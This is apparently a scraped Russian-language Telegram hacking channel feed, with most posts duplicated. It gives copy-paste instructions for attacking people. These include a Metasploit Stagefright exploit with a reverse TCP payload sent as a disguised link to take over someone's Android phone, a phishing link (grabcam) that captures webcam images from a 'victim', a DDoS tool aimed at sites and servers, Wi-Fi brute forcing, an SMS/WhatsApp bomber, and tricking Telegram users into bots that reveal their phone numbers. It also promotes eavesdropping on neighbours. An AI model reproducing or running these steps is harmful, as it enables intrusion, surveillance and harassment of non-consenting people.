Привет! Давно хотелось подслушать за чужими разговорами и узнать все секреты ? Или насолить как-то своему соседу? Тогда можно прослушать его грязные беседы по телефону. Для начала хочу сказать, что хоть это и не дешёвое, но вполне доступное удовольствие.
https://telegra.ph/Kak-proslushat-telefon-soseda-03-15
https://telegra.ph/Kak-proslushat-telefon-soseda-03-15
Telegraph
Как прослушать телефон соседа
Мониторинг мобильных телефонов без ведома их владельцев быстро растет в странах Латинской Америки, таких как Аргентина, Мексика и Бразилия, после того, как они стали очень известными в США с 2008 года. Stingray, GSM-перехватчик, IMSI-перехватчик - это оборудование…
Creepy - OSINT инструмент для определения местоположения
Большинство людей очень пристрастились к социальным сетям, и обмен изображениями - одна из наиболее часто используемых функций этих платформ. Но иногда, когда мы делимся этими фотографиями, это не только изображение, которым мы делимся, но и точное место, где было сделано это изображение.
Creepy - это приложение на Python, которое может извлекать эту информацию и отображать геолокации на карте, а так же фильтровать результаты поиска по точному местоположению и или дате. Полученные результаты можно экспортировать в формат csv или kml для дальнейшего анализа в Google Maps.
https://www.geocreepy.com/
Большинство людей очень пристрастились к социальным сетям, и обмен изображениями - одна из наиболее часто используемых функций этих платформ. Но иногда, когда мы делимся этими фотографиями, это не только изображение, которым мы делимся, но и точное место, где было сделано это изображение.
Creepy - это приложение на Python, которое может извлекать эту информацию и отображать геолокации на карте, а так же фильтровать результаты поиска по точному местоположению и или дате. Полученные результаты можно экспортировать в формат csv или kml для дальнейшего анализа в Google Maps.
https://www.geocreepy.com/
Отключаем слежку Windows
Как вы знаете, компания зла Microsoft тайно следит за своими пользователями (А может и не тайно). Даже при установке Windows нас просят дать согласие на обработку, сбор данных. Конечно, можно отказаться, но это не даёт полной уверенности, что ваши данные не получат третие лица.
Утилита Destroy Windows 10 Spying ( https://github.com/spinda/Destroy-Windows-10-Spying/releases) практически решает эту проблему. Инструмент способен останавливать сервисы, отслеживающие ваши действия, телеметрию. Так жеа DW10S добавляет в "hosts" адреса серверов Microsoft, тем самым запрещает отправку каких-либо данных к ним на виртуальные/физические сервера.
Помимо вышеперечисленных достоинств программы, она способна удалить все предустановленные приложения от Windows. Перед использованием утилиты обязательно создайте резервную копию системы, а также точку её восстановления.
▫️https://github.com/spinda/Destroy-Windows-10-Spying/releases
Как вы знаете, компания зла Microsoft тайно следит за своими пользователями (А может и не тайно). Даже при установке Windows нас просят дать согласие на обработку, сбор данных. Конечно, можно отказаться, но это не даёт полной уверенности, что ваши данные не получат третие лица.
Утилита Destroy Windows 10 Spying ( https://github.com/spinda/Destroy-Windows-10-Spying/releases) практически решает эту проблему. Инструмент способен останавливать сервисы, отслеживающие ваши действия, телеметрию. Так жеа DW10S добавляет в "hosts" адреса серверов Microsoft, тем самым запрещает отправку каких-либо данных к ним на виртуальные/физические сервера.
Помимо вышеперечисленных достоинств программы, она способна удалить все предустановленные приложения от Windows. Перед использованием утилиты обязательно создайте резервную копию системы, а также точку её восстановления.
▫️https://github.com/spinda/Destroy-Windows-10-Spying/releases
TelegramScraper (https://github.com/AbirHasan2005/TelegramScraper) - это утилита которая добавит в Вашу группу пользователей из другого сообщества телеграм всего за 2 минуты. Не рекомендуется делать это часто, т.к. есть возможность получить бан от телеги.
Установка
$
$
Установка
$
pkg install git python -y
$ git clone https://github.com/AbirHasan2005/TelegramScraper
$ cd TelegramScraper
$ chmod +x * && python3 setup.py
Использование$
python3 adder.py
Более подробно об использовании и возможностях утилиты читайте на официальной странице GitHub (https://github.com/AbirHasan2005/TelegramScraper)репозитория.GitHub
GitHub - AbirHasan2005/TelegramScraper: Scrape Telegram group members (hidden members also) and add them to yours.
Scrape Telegram group members (hidden members also) and add them to yours. - AbirHasan2005/TelegramScraper
photo_2021-03-12_14-24-35.jpg
31.2 KB
Подборка сайтов для практики хакинга
1. https://www.hackthissite.org/ — это место для тех, кто хочет попрактиковаться в этичном хакинге;
2. https://defendtheweb.net/?hackthis — разработан для того, чтобы научить вас взламывать, дампать, дифейсить и защищать свой сайт от хакеров;
3. https://www.root-me.org/ — отличный способ проверить себя, улучшить навыки этичного хакинга и знания в области веб-безопасности с помощью более 200 различных заданий;
4. https://hackxor.net/ — игра, созданная для практики взлома веб-приложений;
5. http://google-gruyere.appspot.com/ — этот сайт полон дыр и предназначен для тех, кто только начинает изучать безопасность приложений.
1. https://www.hackthissite.org/ — это место для тех, кто хочет попрактиковаться в этичном хакинге;
2. https://defendtheweb.net/?hackthis — разработан для того, чтобы научить вас взламывать, дампать, дифейсить и защищать свой сайт от хакеров;
3. https://www.root-me.org/ — отличный способ проверить себя, улучшить навыки этичного хакинга и знания в области веб-безопасности с помощью более 200 различных заданий;
4. https://hackxor.net/ — игра, созданная для практики взлома веб-приложений;
5. http://google-gruyere.appspot.com/ — этот сайт полон дыр и предназначен для тех, кто только начинает изучать безопасность приложений.
14153ec4803b1c73fe425fb6aa1d9769.jpg
122.2 KB
Создаём свой «Глаз Бога»
Поехали:
Открывает в телеге бота @CreaterGBOT, он у нас спрашивает API-ключ нашего бота, где его взять?
1.1. Открываем бот @BotFather.
1.2. Отправляем команду /start
1.3. Отправляем команду /newbot
1.4. Вводим название бота. Оно будет отображаться в списке чатов.
1.5. Вводим юзернейм бота. Название должно обязательно оканчиваться на «bot»
1.6. После Успешного создания бота, вы увидите сообщение выше, и там же будет токен формата: 123456789:
Далее....
Копируем API-ключ из @botfather в @CreaterGBOT
ГОТОВО!!! Теперь у вас свой собственный "Глаз Бога", который в меню @CreaterGBOT можете сделать приватным(бот будет отвечать только вам), либо оставить как публичный...
Поехали:
Открывает в телеге бота @CreaterGBOT, он у нас спрашивает API-ключ нашего бота, где его взять?
1.1. Открываем бот @BotFather.
1.2. Отправляем команду /start
1.3. Отправляем команду /newbot
1.4. Вводим название бота. Оно будет отображаться в списке чатов.
1.5. Вводим юзернейм бота. Название должно обязательно оканчиваться на «bot»
1.6. После Успешного создания бота, вы увидите сообщение выше, и там же будет токен формата: 123456789:
Далее....
Копируем API-ключ из @botfather в @CreaterGBOT
ГОТОВО!!! Теперь у вас свой собственный "Глаз Бога", который в меню @CreaterGBOT можете сделать приватным(бот будет отвечать только вам), либо оставить как публичный...
DDOS HTTP/TCP/UDP.
Всем привет, сегодня я вам покажу одну очень интересную утилиту, которая позволяет слать ддос на разные протоколы. Существует три режима - HTTP/TCP/UDP, и у каждого режима свои настройки.
Установка:
▪️apt update -y
▪️apt upgrade -y
▪️apt install git
▪️apt install python
▪️git clone https://github.com/Pix-head/MODoS
▪️cd MODoS
▪️pip install -r requirements.txt
Ну и запуск:
▪️python modos.py HOST PORT PACKETS TIMEOUT
HTTP - для сайтов
TCP - для серверов
UDP - для серверов/игровых серверов
Например:
▪️python modos.py http://google.com 80 50 3
На этом всё.
Всем привет, сегодня я вам покажу одну очень интересную утилиту, которая позволяет слать ддос на разные протоколы. Существует три режима - HTTP/TCP/UDP, и у каждого режима свои настройки.
Установка:
▪️apt update -y
▪️apt upgrade -y
▪️apt install git
▪️apt install python
▪️git clone https://github.com/Pix-head/MODoS
▪️cd MODoS
▪️pip install -r requirements.txt
Ну и запуск:
▪️python modos.py HOST PORT PACKETS TIMEOUT
HTTP - для сайтов
TCP - для серверов
UDP - для серверов/игровых серверов
Например:
▪️python modos.py http://google.com 80 50 3
На этом всё.
Zarp - атака локальных сетей.
Всем привет, сегодня мы с вами установим утилиту, которая может взломать wifi, просканировать сеть, и так же провести анализа трафика, и еще много чего полезного.
Zarp - это инструмент сетевой атаки, основанный на использовании локальных сетей.
Установка:
▪️pkg update -y && pkg upgrade -y
▪️apt install git
▪️pkg install tsu
▪️git clone https://github.com/hatRiot/zarp
▪️cd zarp
▪️sudo ./zarp.py
Утилита очень интересная, я в ней еще до конца не разобрался, так что решил пока что запилить мини пост про установку, следите за каналом, возможно скоро выйдет статья по использованию данного инструмента.
Всем привет, сегодня мы с вами установим утилиту, которая может взломать wifi, просканировать сеть, и так же провести анализа трафика, и еще много чего полезного.
Zarp - это инструмент сетевой атаки, основанный на использовании локальных сетей.
Установка:
▪️pkg update -y && pkg upgrade -y
▪️apt install git
▪️pkg install tsu
▪️git clone https://github.com/hatRiot/zarp
▪️cd zarp
▪️sudo ./zarp.py
Утилита очень интересная, я в ней еще до конца не разобрался, так что решил пока что запилить мини пост про установку, следите за каналом, возможно скоро выйдет статья по использованию данного инструмента.
Как узнать номер телефона через телеграм по username
Сегодня мы поговорим, как практически не напрягаясь узнать номер телефона любого пользователя в телеграм зная только его юзернейм!
Приступим:
1. Для того, чтобы узнать номер телефона, просим того, чей номер нам нужно узнать, перейти по одному из ботов (предлог может быть любым, фантазируйте):
@addprivategroup_bot
@cryptoscanning_bot
@protestchat_bot
@deanonym_bot
@joinchatru_bot
@Checnum_bot
@GetCont_bot
@EyeGoodBot
@Tpoisk_Bot
@LBSE_bot
2. После того, как жертва перешла по ссылке. Нам нужно зайти в бота @deanonym_bot и написать туда username нашего клиента, пишем юзернейм без "@".
3. Все, при условии правильности выполнения всех пунктов, мы получаем номер телефона и радуемся.
Сегодня мы поговорим, как практически не напрягаясь узнать номер телефона любого пользователя в телеграм зная только его юзернейм!
Приступим:
1. Для того, чтобы узнать номер телефона, просим того, чей номер нам нужно узнать, перейти по одному из ботов (предлог может быть любым, фантазируйте):
@addprivategroup_bot
@cryptoscanning_bot
@protestchat_bot
@deanonym_bot
@joinchatru_bot
@Checnum_bot
@GetCont_bot
@EyeGoodBot
@Tpoisk_Bot
@LBSE_bot
2. После того, как жертва перешла по ссылке. Нам нужно зайти в бота @deanonym_bot и написать туда username нашего клиента, пишем юзернейм без "@".
3. Все, при условии правильности выполнения всех пунктов, мы получаем номер телефона и радуемся.
❤1
MyHeritage ( https://www.myheritage.com/deep-nostalgia/ ) — оживи свои фоточки с помощью умной нейронки
Вокруг генеалогического сайта MyHeritage огромный хайп последние дни. Там добавили новую фичу — Deep Nostalgia. Она использует технологии дипфейка, чтобы анимировать лица на любых фотографиях. В Твиттере сходят с ума: реанимируют умерших родственников, Николая II, старые мемы и все что видят.
Кто-то говорит, что выглядит крипово, а кто-то восхищается. Дипфейки и правда выглядят живее, чем на фото, но пока далеко до настоящего вау-эффекта. Но побаловаться точно стоит. Вверху пример той самой бабушки-мема — она «двигается» с помощью Deep Nostalgia.
Вокруг генеалогического сайта MyHeritage огромный хайп последние дни. Там добавили новую фичу — Deep Nostalgia. Она использует технологии дипфейка, чтобы анимировать лица на любых фотографиях. В Твиттере сходят с ума: реанимируют умерших родственников, Николая II, старые мемы и все что видят.
Кто-то говорит, что выглядит крипово, а кто-то восхищается. Дипфейки и правда выглядят живее, чем на фото, но пока далеко до настоящего вау-эффекта. Но побаловаться точно стоит. Вверху пример той самой бабушки-мема — она «двигается» с помощью Deep Nostalgia.
Взлом веб-камеры.
Всем привет сегодня, мы с вами поговорим о том как же можно взломать веб-камеру компьютера или телефона, с помощью термукс.
Grabcam - утилита, которая создаёт фишинг ссылку для уязвимости веб камер.
Установка :
▪️apt update -y
▪️apt upgrade -y
▪️pkg install python -y
▪️pkg install python2 -y
▪️pkg install wget -y
▪️pip install lolcat
▪️pkg install git -y
▪️git clone https://github.com/noob-hackers/grabcam
▪️cd grabcam
▪️chmod +x grabcam.sh
Запуск:
▪️bash grabcam.sh
После этого у вас появится выбор туннелирования, мы выбираем пункт 2 это ngrok. И кидаем ссылку жертве.
Чтобы посмотреть картинку :
▪️ls
▪️termux-open camназваниевашейкартинки.png
На этом все.
Всем привет сегодня, мы с вами поговорим о том как же можно взломать веб-камеру компьютера или телефона, с помощью термукс.
Grabcam - утилита, которая создаёт фишинг ссылку для уязвимости веб камер.
Установка :
▪️apt update -y
▪️apt upgrade -y
▪️pkg install python -y
▪️pkg install python2 -y
▪️pkg install wget -y
▪️pip install lolcat
▪️pkg install git -y
▪️git clone https://github.com/noob-hackers/grabcam
▪️cd grabcam
▪️chmod +x grabcam.sh
Запуск:
▪️bash grabcam.sh
После этого у вас появится выбор туннелирования, мы выбираем пункт 2 это ngrok. И кидаем ссылку жертве.
Чтобы посмотреть картинку :
▪️ls
▪️termux-open camназваниевашейкартинки.png
На этом все.
Обманываем провайдера / Имитация сёрфинга / Мутим алиби
Салам, бандиты. Надеюсь, все в курсе, что провайдеры хранят логи и видят посещения сайтов
Так вот, многие зададут вопрос "А зачём вообще нужно генерировать случайный трафик?". Суть в том, что данный скрипт поможет запутать провайдера (и тех, кто стоит над провайдером), генерируя случайный трафик с вашего IP и создавая видимость того, что вы реально сидите за компом.
Установка в Termux
💲apt instal python git -y
💲git clone https://github.com/1tayH/noisy.git
💲cd noisy
💲pip install -r requirements.txt
Linux (Kali, Debian, Ubuntu, Mint and etc):
💲git clone https://github.com/1tayH/noisy.git
💲cd noisy
💲pip install -r requirements.txt
Использование
💲python noisy.py -h — помощь, просмотр основных аргументов и параметров
💲python noisy.py --config config.json — запуск генерации трафика
Теперь скрипт начнёт заходить на случайный страницы, тем самым имитируя действия реального пользователя.
Скажи отделу К "не сегодня"✌️
Салам, бандиты. Надеюсь, все в курсе, что провайдеры хранят логи и видят посещения сайтов
Так вот, многие зададут вопрос "А зачём вообще нужно генерировать случайный трафик?". Суть в том, что данный скрипт поможет запутать провайдера (и тех, кто стоит над провайдером), генерируя случайный трафик с вашего IP и создавая видимость того, что вы реально сидите за компом.
Установка в Termux
💲apt instal python git -y
💲git clone https://github.com/1tayH/noisy.git
💲cd noisy
💲pip install -r requirements.txt
Linux (Kali, Debian, Ubuntu, Mint and etc):
💲git clone https://github.com/1tayH/noisy.git
💲cd noisy
💲pip install -r requirements.txt
Использование
💲python noisy.py -h — помощь, просмотр основных аргументов и параметров
💲python noisy.py --config config.json — запуск генерации трафика
Теперь скрипт начнёт заходить на случайный страницы, тем самым имитируя действия реального пользователя.
Скажи отделу К "не сегодня"✌️
Получаем доступ к телефону
В данном посте мы поговорим о том, как при помощи одной ссылки получить контроль над чужим телефоном.
Поможет нам в этом специальная утилита Metasploit, которая прекрасно справляется с уязвимостями Android старых версий.
Приступим:
1. Первым делом устанавливаем нашу утилиту в Termux:
apt update
apt upgrade
pkg install unstable-repo
pkg install metasploit
2. После этого запускаем утилиту:
msfconsole
3. Теперь, если Stagefright нет в Metasploit, то скачиваем его и перекидываем в папку с эксплоитами.
4. После этого прописываем:
msfconsole — открытие консоли
use exploit/android/browser/stagefrightmp4tx3g64bit — подключение эксплоита
set SRVHOST вашIP
set URIPATH /
set PAYLOAD linux/armle/mettle/reversetcp
set LHOST вашIP
set VERBOSE true
exploit -j — запуск эксплоита
Для нас сгенерируется специальная ссылка. Заворачиваем её в ngrok, по желанию маскируем и отправляем жертве под любым предлогом. Когда жертва по ней перейдёт, мы получим удалённый доступ к устройству.
В данном посте мы поговорим о том, как при помощи одной ссылки получить контроль над чужим телефоном.
Поможет нам в этом специальная утилита Metasploit, которая прекрасно справляется с уязвимостями Android старых версий.
Приступим:
1. Первым делом устанавливаем нашу утилиту в Termux:
apt update
apt upgrade
pkg install unstable-repo
pkg install metasploit
2. После этого запускаем утилиту:
msfconsole
3. Теперь, если Stagefright нет в Metasploit, то скачиваем его и перекидываем в папку с эксплоитами.
4. После этого прописываем:
msfconsole — открытие консоли
use exploit/android/browser/stagefrightmp4tx3g64bit — подключение эксплоита
set SRVHOST вашIP
set URIPATH /
set PAYLOAD linux/armle/mettle/reversetcp
set LHOST вашIP
set VERBOSE true
exploit -j — запуск эксплоита
Для нас сгенерируется специальная ссылка. Заворачиваем её в ngrok, по желанию маскируем и отправляем жертве под любым предлогом. Когда жертва по ней перейдёт, мы получим удалённый доступ к устройству.
Взламываем Wi-Fi с wi-toolkit
WI-TOOLKIT (https://github.com/mkdirlove/WI-TOOLKIT ) - утилита позволяющая провести брутфорс атаку на выбранную сеть Wi-Fi. Так же данная утилита позволяет начать WPS, WPA/WPA2 атаку, но для этого понадобится подключение к интернету.
Установка
$ git clone https://github.com/mkdirlove/WI-TOOLKIT
$ cd WI-TOOLKIT
$ chmod +x
$ ./install.sh
Использование
$ sudo python wi-toolkit.py
Более подробно об использовании данной утилиты можно почитать на официальной странице на GitHub (https://github.com/mkdirlove/WI-TOOLKIT).
WI-TOOLKIT (https://github.com/mkdirlove/WI-TOOLKIT ) - утилита позволяющая провести брутфорс атаку на выбранную сеть Wi-Fi. Так же данная утилита позволяет начать WPS, WPA/WPA2 атаку, но для этого понадобится подключение к интернету.
Установка
$ git clone https://github.com/mkdirlove/WI-TOOLKIT
$ cd WI-TOOLKIT
$ chmod +x
$ ./install.sh
Использование
$ sudo python wi-toolkit.py
Более подробно об использовании данной утилиты можно почитать на официальной странице на GitHub (https://github.com/mkdirlove/WI-TOOLKIT).
Самый функциональный sms-бомбер на Windows и Linux
BOMBERTHON - интересная реализация SMS бомбера, работающего посредством браузера, в который внедрен спам в Whatsapp и Instagram. Так же утилита позволяет настроить кол-во отправляемых сообщений от 1 до 200, кроме того бомбер совместим не только с Windows, но и с Linux.
Установка на Linux
$ git clone https://github.com/b31ngD3v/bomberthon
$ cd bomberthon
$ pip3 install -r requirements.txt
$ sudo chmod +x geckodriver
Использование
$ python3 bomberthon.py
BOMBERTHON - интересная реализация SMS бомбера, работающего посредством браузера, в который внедрен спам в Whatsapp и Instagram. Так же утилита позволяет настроить кол-во отправляемых сообщений от 1 до 200, кроме того бомбер совместим не только с Windows, но и с Linux.
Установка на Linux
$ git clone https://github.com/b31ngD3v/bomberthon
$ cd bomberthon
$ pip3 install -r requirements.txt
$ sudo chmod +x geckodriver
Использование
$ python3 bomberthon.py